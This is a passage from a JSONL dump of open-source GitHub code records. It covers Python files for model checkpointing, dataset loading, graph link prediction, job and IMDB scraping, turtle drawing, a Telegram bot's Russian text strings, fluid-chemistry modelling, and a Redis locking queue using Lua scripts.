'.pkl'), 'rb') as f:\n histories = misc_utils.pickle_load(f)\n return infos, histories\n\n\ndef load_model(model, opt):\n # check if all necessary files exist\n assert os.path.isdir(opt.start_from), \" %s must be a a path\" % opt.start_from\n assert os.path.isfile(os.path.join(opt.start_from, \"infos_\" + opt.id + \".pkl\")), \\\n \"infos.pkl file does not exist in path %s\" % opt.start_from\n model.load_state_dict(torch.load(os.path.join(opt.start_from, 'model.pth')))\n\n\ndef load_optimizer(optimizer, opt):\n optimizer.load_state_dict(torch.load(os.path.join(opt.start_from, 'model_optimizer.pth')))\n\n\n@torch.no_grad()\ndef checkpoint(\n model, optimizer, crit, loader,\n eval_kwargs, histories, infos, opt,\n iteration, best_val_score,\n logger\n):\n # val_loss, predictions, lang_stats = eval_utils.eval_split(\n # model.decoder, crit, loader, eval_kwargs)\n val_loss, predictions, lang_stats = eval.evaluate(model, crit, loader, eval_kwargs)\n\n # Write validation result into summary\n logger.val_log('validation_loss', val_loss, iteration)\n if lang_stats is not None:\n for k, v in lang_stats.items():\n logger.val_log(k, v, iteration)\n histories['val_result_history'][iteration] = {\n 'loss': val_loss, 'lang_stats': lang_stats, 'predictions': predictions\n }\n\n # Save model if improving on validation result\n if opt.language_eval == 1:\n current_score = lang_stats['CIDEr']\n else:\n current_score = - val_loss\n\n best_flag = False\n if best_val_score is None or current_score > best_val_score:\n best_val_score = current_score\n best_flag = True\n # Dump miscalleous information\n infos['best_val_score'] = best_val_score\n\n save_checkpoint(model, infos, optimizer, opt, histories)\n if opt.save_history_ckpt:\n save_checkpoint(model, infos, optimizer, opt, append=str(iteration))\n if best_flag:\n save_checkpoint(model, infos, optimizer, opt, append='best')\n\n return best_val_score\n","repo_name":"GjQAQ/RobustImageCaptioning","sub_path":"utils/checkpoint.py","file_name":"checkpoint.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28349554265","text":"# -*- coding: utf-8 
-*-\n\"\"\"\n@author:XuMing(xuming624@qq.com)\n@description:\n\ndata format:\n\nuser\titem\trating\ttimestamp\n1\t1193\t5\t978300760\n1\t661\t3\t978302109\n1\t914\t3\t978301968\n1\t3408\t4\t978300275\n1\t2355\t5\t97882429\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport os\nimport sys\n\nimport pandas as pd\nfrom six.moves import input\n\nfrom . import download_builtin_dataset, BUILTIN_DATASETS\nfrom ..features.feature_dict import FeatureDict, process_features\n\n\nclass Movielens:\n \"\"\"`Movielens `_ Dataset.\n\n If the dataset has not already been loaded, it will be downloaded and saved.\n\n Args:\n name(:obj:`string`): The name of the built-in dataset to load.\n Accepted values are 'ml-100k.zip', 'ml-1m.zip', and 'jester_dataset_2.zip'.\n Default is 'ml-100k.zip'.\n prompt(:obj:`bool`): Prompt before downloading if dataset is not\n already on disk.\n Default is True.\n\n Returns:\n A :obj:`Dataset` object.\n\n Raises:\n ValueError: If the ``name`` parameter is incorrect.\n\n \"\"\"\n\n def __init__(self, name='ml-100k.zip', prompt=True, shuffle=True, n_samples=-1):\n self.name = name\n self.shuffle = shuffle\n self.n_samples = n_samples\n\n try:\n dataset = BUILTIN_DATASETS[name]\n except KeyError:\n raise ValueError('unknown dataset ' + name +\n '. Accepted values are ' +\n ', '.join(BUILTIN_DATASETS.keys()) + '.')\n\n # if dataset does not exist, offer to download it\n if not os.path.isfile(dataset.path):\n answered = not prompt\n while not answered:\n print('Dataset ' + name + ' could not be found. Do you want '\n 'to download it? [Y/n] ', end='')\n choice = input().lower()\n\n if choice in ['yes', 'y', '', 'ok', 'true']:\n answered = True\n elif choice in ['no', 'n', 'false']:\n print(\"Ok then, I'm out!\")\n sys.exit()\n\n download_builtin_dataset(name)\n\n self.line_format, self.sep = dataset.reader_params\n splitted_format = self.line_format.split()\n\n self.columns = ['user', 'item', 'rating']\n if 'timestamp' in splitted_format:\n self.with_timestamp = True\n self.columns.append('timestamp')\n else:\n self.with_timestamp = False\n\n # check that all fields are correct\n if any(field not in self.columns for field in splitted_format):\n raise ValueError('line_format parameter is incorrect.')\n\n self.data_file = dataset.path\n self.data = self.read_data(dataset.path)\n\n def read_data(self, file_name):\n \"\"\"Return a list of ratings (user, item, rating, timestamp) read from file_name\"\"\"\n file_path = os.path.expanduser(file_name)\n data = pd.read_csv(file_path, delimiter=self.sep, header=None)\n data.columns = self.columns\n\n # Sample data\n if self.n_samples > 0:\n data = data.sample(n=self.n_samples)\n data.reset_index(drop=True, inplace=True)\n elif self.shuffle:\n data = data.sample(frac=1)\n data.reset_index(drop=True, inplace=True)\n\n # Add cols\n data[self.columns] = data[self.columns].fillna(0)\n return data\n\n def get_features(self, binarize=True):\n \"\"\"\n Get feature dict\n :param binarize: bool\n :return: features, X_idx, X_value, y, category_index, continuous_value\n \"\"\"\n # build feature instance\n features = FeatureDict()\n for column in ['user', 'item']:\n features.add_categorical_feat(column)\n\n X_idx, X_value, category_index, continuous_value = process_features(features, self.data)\n y = self.data.rating\n if binarize:\n def transform_y(label):\n if label > 3:\n return 1\n else:\n return 0\n\n y = y.apply(transform_y)\n return features, X_idx, X_value, y, category_index, 
continuous_value\n\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' name: {}\\n'.format(self.name)\n fmt_str += ' data size: {}\\n'.format(len(self.data))\n fmt_str += ' shuffle: {}\\n'.format(self.shuffle)\n fmt_str += ' data file: {}\\n'.format(self.data_file)\n fmt_str += ' line format: {}\\n'.format(self.line_format)\n fmt_str += ' data head: {}\\n'.format(self.data.head(n=1))\n return fmt_str\n","repo_name":"shibing624/rater","sub_path":"rater/datasets/movielens.py","file_name":"movielens.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"77"} +{"seq_id":"35212863245","text":"import os\r\nimport random\r\n\r\nimport numpy as np\r\nimport torch\r\n\r\n\r\ndef get_successors(dataset, nb_nodes):\r\n successor = {}\r\n perm = []\r\n for node1, node2 in dataset:\r\n if node1 not in successor.keys():\r\n successor[node1] = [node2]\r\n else:\r\n successor[node1] += [node2]\r\n perm.append(node1 * nb_nodes + node2)\r\n return successor, perm\r\n\r\n\r\ndef remap(nodeids_npy1, nodeids_npy2):\r\n all_nodeids = np.unique(np.concatenate([nodeids_npy1, nodeids_npy2]))\r\n nb_nodes = all_nodeids.shape[0]\r\n print('>> number of nodes:{}'.format(nb_nodes))\r\n dicts = {}\r\n for ix, nodeid in enumerate(np.unique(all_nodeids)):\r\n dicts[nodeid] = ix\r\n remaped_nodeid1 = np.array(list(map(dicts.get, nodeids_npy1.flatten()))).reshape(nodeids_npy1.shape)\r\n remaped_nodeid2 = np.array(list(map(dicts.get, nodeids_npy2.flatten()))).reshape(nodeids_npy2.shape)\r\n return remaped_nodeid1, remaped_nodeid2, nb_nodes\r\n\r\n\r\ndef load1(dataset):\r\n dir = '../node_embedding/dataset/processed/'\r\n print('===' * 20)\r\n print('>> dataset is {}'.format(dataset))\r\n train_file = dir + '{}/{}_train.txt'.format(dataset, dataset)\r\n test_file = dir + '{}/{}_test.txt'.format(dataset, dataset)\r\n train_npy = np.loadtxt(train_file, delimiter=' ', dtype=np.int)\r\n test_npy = np.loadtxt(test_file, delimiter=' ', dtype=np.int)\r\n train_npy, test_npy, nb_nodes = remap(train_npy, test_npy)\r\n\r\n successors1 = get_successors(train_npy, nb_nodes)\r\n successors2 = get_successors(test_npy, nb_nodes)\r\n\r\n train_data = torch.from_numpy(train_npy).transpose(0, 1)\r\n test_data = torch.from_numpy(test_npy).transpose(0, 1)\r\n\r\n return train_data, test_data, nb_nodes, successors1, successors2\r\n\r\n\r\ndef hidden_edges(edge_index, nb_nodes, dataset):\r\n cache_path = './data/processed/{}/{}.processed.pt'.format(dataset, dataset)\r\n adj = np.zeros([nb_nodes, nb_nodes])\r\n adj[edge_index[0], edge_index[1]] = 1\r\n h_out = []\r\n h_in = []\r\n for i in range(adj.shape[0]):\r\n node_out = np.where(adj[i, :] != 0)[0]\r\n node_in = np.where(adj[:, i] != 0)[0]\r\n if len(node_out) != 0:\r\n r_node_out = random.choice(node_out)\r\n h_out.append((i, r_node_out))\r\n if len(node_in) != 0:\r\n r_node_in = random.choice(node_in)\r\n h_in.append((r_node_in, i))\r\n hidden_ = list(set(h_out).union(set(h_in)))\r\n k1 = k2 = 0\r\n # 统计没有out link的node, adj, adj.T\r\n for i in adj:\r\n if i.max() == 0:\r\n k1 += 1\r\n for j in adj.T:\r\n if j.max() == 0:\r\n k2 += 1\r\n print('{} {}'.format(k1, k2))\r\n # 把选中的hidden从edge_index中隐藏\r\n hidden_perm = np.array([a[0] * nb_nodes + a[1] for a in hidden_])\r\n all_perm = edge_index[0] * nb_nodes + edge_index[1]\r\n train_perm = np.setdiff1d(all_perm, hidden_perm)\r\n print('number of train links:{}'.format(train_perm.shape[0]))\r\n print('number of test 
links:{}'.format(hidden_perm.shape[0]))\r\n print('number of all links:{}'.format(all_perm.shape[0]))\r\n # saved\r\n torch.save((train_perm, h_in, h_out, nb_nodes), cache_path)\r\n print('>> saved!')\r\n mask1 = train_perm // nb_nodes\r\n mask2 = train_perm % nb_nodes\r\n adj[mask1, mask2] = 0\r\n return train_perm, h_in, h_out, nb_nodes\r\n\r\n\r\ndef load_feat(raw_file, node_index):\r\n import pandas as pd\r\n node_index_list = []\r\n for key, value in node_index.items():\r\n node_index_list.append([key, value])\r\n df_node_index = pd.DataFrame(node_index_list, columns=['id', 'index'])\r\n f = open(raw_file, 'r')\r\n feat = []\r\n for line in f.readlines():\r\n line_ = line.strip('\\n').split('\\t')[:-1]\r\n feat.append(line_)\r\n df_feat = pd.DataFrame(feat)\r\n df_feat = df_feat.rename(columns={0: 'id'})\r\n df = pd.merge(df_node_index, df_feat, how='left', on='id')\r\n df.sort_values(by='index', ascending=True, inplace=True)\r\n df_feat_reindex = df.drop(['id', 'index'], axis=1)\r\n np_feat = df_feat_reindex.astype(np.float64).to_numpy()\r\n return np_feat\r\n\r\n\r\ndef load(dataset):\r\n dir = './data/raw/'\r\n print('===' * 20)\r\n print('>> dataset is {}'.format(dataset))\r\n raw_file = dir + '{}/{}.cites'.format(dataset, dataset)\r\n raw_feat_file = dir + '{}/{}.content'.format(dataset, dataset)\r\n processed_file = './data/processed/{}/{}.processed.pt'.format(dataset, dataset)\r\n edge_list = []\r\n if os.path.isfile(processed_file):\r\n train_perm, h_in, h_out, nb_nodes = torch.load(processed_file)\r\n print('>> number of nodes: {}'.format(nb_nodes))\r\n else:\r\n with open(raw_file, 'r') as f:\r\n node_index = {}\r\n ix = 0\r\n for line in f.readlines():\r\n src, dst = line.strip('\\n').split('\\t')[:2]\r\n if src not in node_index.keys():\r\n node_index[src] = ix\r\n ix += 1\r\n if dst not in node_index.keys():\r\n node_index[dst] = ix\r\n ix += 1\r\n edge_list.append([node_index[dst], node_index[src]])\r\n nb_nodes = len(node_index)\r\n nb_links = len(edge_list)\r\n print('>> number of nodes: {}'.format(nb_nodes))\r\n print('>> number of links: {}'.format(nb_links))\r\n edge_index = np.transpose(np.array(edge_list))\r\n train_perm, h_in, h_out, nb_nodes = hidden_edges(edge_index, nb_nodes, dataset)\r\n feat = load_feat(raw_feat_file, node_index)\r\n return train_perm, h_in, h_out, nb_nodes, feat\r\n\r\n\r\nif __name__ == '__main__':\r\n dataset = 'cora'\r\n dataset = 'citeseer'\r\n load(dataset)\r\n\r\n","repo_name":"ziqiaomeng/directed-graph","sub_path":"directed-graph-pyg/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73561953849","text":"import urllib.request\r\nimport urllib.parse\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nclass ZhilianSpider(object):\r\n url = 'https://sou.zhaopin.com/?'\r\n\r\n def __init__(self, city, kw, sp, ep):\r\n # 将上面的参数都保存为自己的成员属性\r\n self.jl = city\r\n self.kw = kw\r\n self.sp = sp\r\n self.ep = ep\r\n pass\r\n\r\n def handle_request(self, page): # 根据信息生成访问的url,并构建请求\r\n query_string = {\r\n 'p': page,\r\n 'jl': self.jl,\r\n 'kw': self.kw,\r\n }\r\n string = urllib.parse.urlencode(query_string)\r\n final_url = self.url + string\r\n # print(final_url)\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'\r\n }\r\n request = urllib.request.Request(url=final_url, headers=headers)\r\n return request\r\n\r\n def 
parse(self, content): # 解析内容\r\n # soup = BeautifulSoup(content, 'lxml') # 生成对象\r\n # 思路;先找到所有“div class=\"contentpile__content__wrapper__item clearfix\"”,一个工作岗位就是一个这个玩意儿,然后通过这个对象的find、select方法去寻找没一条记录里的信息\r\n # div_list = soup.select('.contentpile')\r\n soup = BeautifulSoup(open('zhilian_test.html'), 'lxml')\r\n div_list = soup.select('#listContent > .contentpile__content__wrapper clearfix')\r\n print(div_list)\r\n print(len(div_list))\r\n\r\n def run(self): # 总程序\r\n for page in range(self.sp, self.ep+1):\r\n request = self.handle_request(page)\r\n content = urllib.request.urlopen(request).read().decode()\r\n # print(content)\r\n # 解析内容\r\n self.parse(content)\r\n\r\n\r\ndef main():\r\n city = input('请输入您想查询的城市:')\r\n kw = input('请输入工作关键字:')\r\n sp = int(input('请输入起始页码:'))\r\n ep = int(input('请输入结束页码:'))\r\n # 创建对象,启动爬取程序\r\n spider = ZhilianSpider(city, kw, sp, ep)\r\n spider.run()\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"kevinhkr/Cra","sub_path":"41_zhilian.py","file_name":"41_zhilian.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27440334269","text":"# draw a red circle\r\n# By bichicode\r\n\r\nimport turtle\r\nfrom turtle import bye\r\n\r\n\r\nturtle.penup()\r\n\r\n# I don't like the cursor\r\nturtle.hideturtle()\r\n\r\n# Set position\r\nturtle.goto(0, -75)\r\n\r\n# draw the circle\r\nturtle.pendown()\r\n\r\nturtle.pencolor(\"red\")\r\n\r\n# color the circle\r\nturtle.fillcolor('red')\r\n\r\nturtle.begin_fill()\r\n\r\nturtle.circle(150, 360)\r\n\r\nturtle.end_fill()\r\n\r\nturtle.penup()\r\n\r\n# My name\r\nturtle.goto(0, -160)\r\n\r\nturtle.pendown()\r\n\r\nturtle.color('purple')\r\n\r\nstyle = ('Courier', 20, 'italic')\r\n\r\nturtle.write('Bichicode', font=style, align='center')\r\n\r\n# Close with enter\r\nturtle.onkeypress(bye, '\\r')\r\n\r\nturtle.listen()\r\n\r\nturtle.done()\r\n","repo_name":"bichicode/ExtraProyects","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69824683130","text":"class Texts:\n start = \"Привет! Я бот, который уведомляет об открытии продаж на сайте aeza.net. \\\nЧтобы получать уведомления, нажми кнопку ниже. Напиши /help для списка команд.\"\n start_subscribed = \"Привет! Я бот, который уведомляет об открытии продаж на сайте aeza.net. \\\nВы уже подписаны на уведомления. Чтобы отписаться, нажми кнопку ниже. Напиши /help для списка команд.\"\n help = \"Я бот, который уведомляет об открытии продаж на сайте aeza.net. \\nЧтобы получать уведомления, введи команду \\\n/start. \\n/status для получения текущего статуса.\\nВеб-страница мониторинга https://aeza-monitor.cofob.dev/status/locations\\\n\\n\\nБота написал @cofob на Python и aiogram, исходники \\\n- https://github.com/cofob/aeza-assistant\"\n pm_for_command = \"Напиши в ЛС с этой командой, в чатах она отключена.\"\n no_rights = \"Недостаточно прав для выполнения этой команды.\"\n subscribe = \"Получать уведомления\"\n subscribed = \"Вы подписались на уведомления!\"\n unsubscribe = \"Отписаться\"\n unsubscribed = \"Вы отписались от уведомлений.\"\n available = \"🟢 {}\"\n unavailable = \"🔴 {}\"\n current_status = \"Доступные для аренды локации:\\n{}\"\n state_changed = \"Список доступных для аренды локаций изменился!\\n{}\"\n added_to_chat = \"Привет, я добавлен в этот чат! 
Напиши /help@{username} для получения списка команд. Можешь нажать \\\nкнопку ниже, чтобы получать уведомления об открытии продаж на сайте aeza.net.\"\n bot_is_loading = \"Бот еще загружается, попробуйте позже.\"\n","repo_name":"cofob/aeza-assistant","sub_path":"aeza_assistant/texts.py","file_name":"texts.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"ru","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"791461912","text":"vowels = [\"a\", \"e\", \"i\", \"o\", \"u\"]\nword = input(\"英単語を入力してください。母音を探します:\")\n\nfound = []\n\nfor letter in word:\n if letter in vowels:\n if letter not in found:\n found.append(letter)\n\nprint(*found, sep=\"\\n\")\n","repo_name":"TakutoHashimoto/head_first_python","sub_path":"chap3/vowels3.py","file_name":"vowels3.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31565710131","text":"# -*- coding: utf-8 -*-\n# Author: Yiping Liu\n# Description: This script calculates the average of a list of numbers.\n# Version: 1.0\n# Last Modified: May 7, 2023\n\nimport sys\nimport os\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.dirname(SCRIPT_DIR))\n\nfrom Pitzer.models import FluidPitzer\nimport pandas as pd\n\n\n# columns = [\n# 'T',\n# 'Na+',\n# 'Ca+2',\n# # 'K+',\n# # 'Li+',\n# # 'Mg+2',\n# # 'Sr+2',\n# # 'Cs+',\n# # 'Rb+',\n# 'Mn+2',\n# 'Zn+2',\n# 'Pb+2'\n# ]\n# df = pd.DataFrame(columns=columns)\n#\n# def replace_blanks_with_commas(input_string):\n# # replace blank spaces with commas in each row and convert to tuple of floats (or strings)\n# rows = input_string.strip().split('\\n')\n# replaced_rows = []\n# for row in rows:\n# row_as_list = []\n# for num in row.split():\n# try:\n# row_as_list.append(float(num))\n# except ValueError:\n# row_as_list.append(num)\n# row_as_tuple = tuple(row_as_list)\n# replaced_rows.append(row_as_tuple)\n#\n# # output as list of tuples\n# output = replaced_rows\n#\n# return output\n#\n#\n# data = \"\"\"\n# -21.90364364\t1\t0.261712115\t0.002102761\t0.002044225\t0.000300444\n# \"\"\"\n# data = replace_blanks_with_commas(data)\n#\n#\n#\n# for dt in data:\n# print(dt)\n# species = {\n# 'Na+': dt[1],\n# 'Ca+2': dt[2],\n# # 'K+': dt[3],\n# # 'Li+': dt[4],\n# # 'Mg+2': dt[5],\n# # 'Sr+2': dt[6],\n# # 'Cs+': dt[7],\n# # 'Rb+': dt[8],\n# 'Mn+2': dt[3],\n# 'Zn+2': dt[4],\n# 'Pb+2': dt[5]\n# }\n# fluid = FluidPitzer(\n# x0=(3, 5),\n# species=species,\n# t=dt[0],\n# solids=['H2O(S)']\n# )\n# print(fluid.solids)\n# result = fluid.optimize()\n# if result.success:\n# for key, value in species.items():\n# species[key] = value * result.x[0]\n#\n# values_list = list(species.values())\n#\n# # create a new DataFrame with the current row data and concatenate it with the existing DataFrame\n# row_data = [dt[0]] + values_list\n# row_df = pd.DataFrame([row_data], columns=columns)\n# df = pd.concat([df, row_df], ignore_index=True)\n#\n# print(df)\n#\n# # write the DataFrame to a CSV file\n# df.to_csv(r'E:\\work\\data\\low-T\\general_result.csv', index=False)\n\n# aqueous species determined in LA-ICP-MS analysis\nspecies = {\n 'Na+': 1,\n 'K+': 2,\n}\nfluid = FluidPitzer(\n x0=(3, 3),\n species=species,\n # melting temperature of the last solid\n t=25,\n # the last melting solid\n solids=['KCl']\n)\n\nresult = 
fluid.optimize()\n\nprint(result)","repo_name":"pypitzer/pypitzer","sub_path":"src/examples/quantification/fi_quantification.py","file_name":"fi_quantification.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"1356033666","text":"import scrapy\n\nclass imdbSpider(scrapy.Spider):\n name = 'imdb_name'\n start_urls = [ \n 'https://www.imdb.com/chart/top/'\n ]\n\n def parse(self, response):\n # title = response.css('title::text')[0].extract()\n # title = response.css('title::text').extract_first() # extract_first is better than [0]\n title = response.css('h1.header::text').extract()\n subtitle = response.css('div.byline::text').extract()\n title_movie = response.xpath('//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"titleColumn\", \" \" ))]//a/text()').extract()\n year_movie = response.xpath('//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"secondaryInfo\", \" \" ))]/text()').extract()\n rating = response.xpath('//strong/text()').extract()\n yield {'titletext' : title, 'subtitle' : subtitle, 'title_movie' : title_movie, 'year_movie' : year_movie, 'rating' : rating}","repo_name":"emaddar/IMDB-Scraper","sub_path":"imdb/imdb/spiders/imdb_spider.py","file_name":"imdb_spider.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31975160414","text":"\"\"\"\nDistributed Locking Queue for Redis adapted from the Redlock algorithm.\n\"\"\"\nimport random\nimport sys\nimport time\nfrom itertools import chain\n\nfrom . import util\nfrom . import exceptions\nfrom . import log\n\n\n# Lua scripts that are sent to redis\nSCRIPTS = dict(\n # keys:\n # h_k = ordered hash of key in form: priority:insert_time_since_epoch:key\n # Q = sorted set of queued keys, h_k\n # Qi = sorted set mapping h_k to key for all known queued or completed items\n #\n # args:\n # expireat = seconds_since_epoch, presumably in the future\n # client_id = unique owner of the lock\n # randint = a random integer that changes every time script is called\n\n # returns 1\n lq_put=dict(keys=('Q', 'h_k'), args=(), script=\"\"\"\nredis.call(\"ZINCRBY\", KEYS[1], 0, KEYS[2])\nreturn 1\n\"\"\"),\n\n # returns 1 if got an item, and returns an error otherwise\n lq_get=dict(keys=('Q', ), args=('client_id', 'expireat'), script=\"\"\"\nlocal h_k = redis.call(\"ZRANGE\", KEYS[1], 0, 0)[1]\nif nil == h_k then return {err=\"queue empty\"} end\nif false == redis.call(\"SET\", h_k, ARGV[1], \"NX\") then\n return {err=\"already locked\"} end\nif 1 ~= redis.call(\"EXPIREAT\", h_k, ARGV[2]) then\n return {err=\"invalid expireat\"} end\nredis.call(\"ZINCRBY\", KEYS[1], 1, h_k)\nreturn h_k\n\"\"\"),\n\n # returns 1 if got lock. 
Returns an error otherwise\n lq_lock=dict(\n keys=('h_k', 'Q'), args=('expireat', 'randint', 'client_id'), script=\"\"\"\nif false == redis.call(\"SET\", KEYS[1], ARGV[3], \"NX\") then -- did not get lock\n local rv = redis.call(\"GET\", KEYS[1])\n if rv == \"completed\" then\n redis.call(\"ZREM\", KEYS[2], KEYS[1])\n return {err=\"already completed\"}\n elseif rv == ARGV[3] then\n if 1 ~= redis.call(\"EXPIREAT\", KEYS[1], ARGV[1]) then\n return {err=\"invalid expireat\"} end\n return 1\n else\n local score = tonumber(redis.call(\"ZSCORE\", KEYS[2], KEYS[1]))\n math.randomseed(tonumber(ARGV[2]))\n local num = math.random(math.floor(score) + 1)\n if num ~= 1 then\n redis.call(\"ZINCRBY\", KEYS[2], (num-1)/score, KEYS[1])\n end\n return {err=\"already locked\"}\n end\nelse\n if 1 ~= redis.call(\"EXPIREAT\", KEYS[1], ARGV[1]) then\n return {err=\"invalid expireat\"} end\n redis.call(\"ZINCRBY\", KEYS[2], 1, KEYS[1])\n return 1\nend\n\"\"\"),\n\n # return 1 if extended lock. Returns an error otherwise.\n # otherwise\n lq_extend_lock=dict(\n keys=('h_k', ), args=('expireat', 'client_id'), script=\"\"\"\nlocal rv = redis.call(\"GET\", KEYS[1])\nif ARGV[2] == rv then\n if 1 ~= redis.call(\"EXPIREAT\", KEYS[1], ARGV[1]) then\n return {err=\"invalid expireat\"} end\n return 1\nelseif \"completed\" == rv then return {err=\"already completed\"}\nelseif false == rv then return {err=\"expired\"}\nelse return {err=\"lock stolen\"} end\n\"\"\"),\n\n # returns 1 if removed, 0 if key was already removed.\n lq_consume=dict(\n keys=('h_k', 'Q', 'Qi'), args=('client_id', ), script=\"\"\"\nlocal rv = redis.pcall(\"GET\", KEYS[1])\nif ARGV[1] == rv or \"completed\" == rv then\n redis.call(\"SET\", KEYS[1], \"completed\")\n redis.call(\"PERSIST\", KEYS[1]) -- or EXPIRE far into the future...\n redis.call(\"ZREM\", KEYS[2], KEYS[1])\n if \"completed\" ~= rv then redis.call(\"INCR\", KEYS[3]) end\n return 1\nelse return 0 end\n\"\"\"),\n\n # returns nil. 
markes job completed\n lq_completed=dict(\n keys=('h_k', 'Q', 'Qi'), args=(), script=\"\"\"\nif \"completed\" ~= redis.call(\"GET\", KEYS[1]) then\n redis.call(\"INCR\", KEYS[3])\n redis.call(\"SET\", KEYS[1], \"completed\")\n redis.call(\"PERSIST\", KEYS[1]) -- or EXPIRE far into the future...\n redis.call(\"ZREM\", KEYS[2], KEYS[1])\nend\n\"\"\"),\n\n # returns 1 if removed, 0 otherwise\n lq_unlock=dict(\n keys=('h_k', ), args=('client_id', ), script=\"\"\"\nif ARGV[1] == redis.call(\"GET\", KEYS[1]) then\n return redis.call(\"DEL\", KEYS[1])\nelse return 0 end\n\"\"\"),\n\n # returns number of items {(queued + taken), completed}\n # O(log(n))\n lq_qsize_fast=dict(\n keys=('Q', 'Qi'), args=(), script=\"\"\"\nreturn {redis.call(\"ZCARD\", KEYS[1]), redis.call(\"INCRBY\", KEYS[2], 0)}\n\"\"\"),\n\n # returns number of items {in_queue, taken, completed}\n # O(n) -- eek!\n lq_qsize_slow=dict(\n keys=('Q', 'Qi'), args=(), script=\"\"\"\nlocal taken = 0\nlocal queued = 0\nfor _,k in ipairs(redis.call(\"ZRANGE\", KEYS[1], 0, -1)) do\n local v = redis.call(\"GET\", k)\n if \"completed\" ~= v then\n if v then taken = taken + 1\n else queued = queued + 1 end\n end\nend\nreturn {queued, taken, redis.call(\"INCRBY\", KEYS[2], 0)}\n\"\"\"),\n\n # returns whether an item is in queue or currently being processed.\n # raises an error if already completed.\n # O(1)\n lq_is_queued_h_k=dict(\n keys=('Q', 'h_k'), args=(), script=\"\"\"\nlocal taken = redis.call(\"GET\", KEYS[2])\nif \"completed\" == taken then\n return {err=\"already completed\"}\nelseif taken then return {true, false}\nelse return {false, false ~= redis.call(\"ZSCORE\", KEYS[1], KEYS[2])} end\n\"\"\"),\n\n # returns whether an item is in queue or currently being processed.\n # raises an error if already completed.\n # O(N * strlen(item)) -- eek!\n lq_is_queued_item=dict(\n keys=('Q', 'item'), args=(), script=\"\"\"\nfor _,k in ipairs(redis.call(\"ZRANGE\", KEYS[1], 0, -1)) do\n if string.sub(k, -string.len(KEYS[2])) == KEYS[2] then\n local taken = redis.call(\"GET\", k)\n if taken then\n if \"completed\" == taken then return {err=\"already completed\"} end\n return {true, false}\n else\n return {false, true} end\n end\nend\nreturn {false, false}\n\"\"\"),\n\n)\n\n\nclass LockingQueue(object):\n \"\"\"\n A Distributed Locking Queue implementation for Redis.\n \"\"\"\n\n def __init__(self, mr_client, queue_path):\n \"\"\"\n `mr_client` - an instance of the MajorityRedis client.\n `queue_path` - a Redis key specifying where the queued items are\n \"\"\"\n if mr_client._threadsafe:\n self._client_id = random.randint(1, sys.maxsize)\n else:\n self._client_id = mr_client._client_id\n\n self._mr = mr_client\n self._params = dict(\n Q=queue_path, Qi=\".%s\" % queue_path,\n client_id=self._client_id)\n\n def size(self, queued=True, taken=True, completed=False):\n \"\"\"\n Return the approximate number of items in the queue, across all servers\n\n `queued` - number of items in queue that aren't being processed\n `taken` - number of items in queue that are currently being processed\n `completed` - number of items consumed from queue\n\n Because we cannot lock all redis servers at the same time and we don't\n store a lock/unlock history, we cannot get the exact number of items in\n the queue at a specific time.\n\n If the parameters, `taken` and `queued` are not both True or both False,\n the time complexity is O(n) and this can block Redis if you have\n a large queue. 
Otherwise, complexity is O(log(n))\n \"\"\"\n if not queued and not taken and not completed:\n raise UserWarning(\"At least one kwarg cannot be False\")\n if taken == queued:\n counts = (x[1] for x in util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_qsize_fast', self._mr._clients, **(self._params))\n if not isinstance(x[1], Exception))\n if completed and taken:\n return max(x[0] + x[1] for x in counts)\n i = 0 if taken else 1\n return max(x[i] for x in counts)\n\n counts = (x[1] for x in util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_qsize_slow', self._mr._clients, **(self._params))\n if not isinstance(x[1], Exception))\n i = 0 if queued else 1\n if completed:\n return max(x[2] + x[i] for x in counts)\n else:\n return max(x[i] for x in counts)\n\n def is_queued(self, h_k=None, item=None, taken=True, queued=True,\n completed=False):\n \"\"\"\n Return True if item is queued on majority of servers, False otherwise\n\n `item` - A value that we've put into the queue one or more times\n `h_k` - the item hash that uniquely identifies a put\n\n `queued` - item is queued but not currently being processed\n `taken` - item is currently being processed\n `completed` - item has been consumed from queue\n\n If passing an item hash, `h_k`, runtime is O(1)\n If passing an `item` runtime is a slow O(N), and blocks your redis\n while running. Try not to use this too often with large queues.\n Keep in mind that one item can be put many times, so an item can\n map to many item hashes. We return True if any of the item's\n item_hashes meets your query criteria (taken, queued, completed)\n \"\"\"\n if not taken and not queued:\n raise UserWarning(\"either taken or queued must be True\")\n results = list(self._is_queued(h_k, item))\n if h_k:\n self._verify_not_already_completed(results, h_k)\n nerrs, cnt = 0, 0\n clis = []\n for cli, taken_queued in results:\n 